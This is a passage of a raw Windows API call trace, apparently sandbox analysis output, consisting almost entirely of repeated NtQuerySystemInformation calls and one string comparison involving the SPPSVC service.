(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0271.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0271.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x28, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0271.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0271.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0271.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7a0, Length=0x20, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0271.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0271.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0271.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0271.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0271.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0271.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0271.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0271.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0271.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0271.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0271.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0271.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0271.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0271.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc820, Length=0x20, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc820, Length=0x20, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd88, Length=0x50, ResultLength=0x0) [0271.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0271.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x28, ResultLength=0x0) [0271.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x28, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x20, ResultLength=0x0) [0271.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0271.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0271.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0271.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0271.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x20, ResultLength=0x0) [0271.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0271.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0271.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0271.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0271.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0271.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0271.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0271.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0271.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0271.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0271.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0271.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0271.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.845] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc18, Length=0x50, ResultLength=0x0) [0271.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0271.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0271.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0271.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0271.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0271.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0271.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0271.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0271.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0271.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0271.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.855] NtQuerySystemInformation 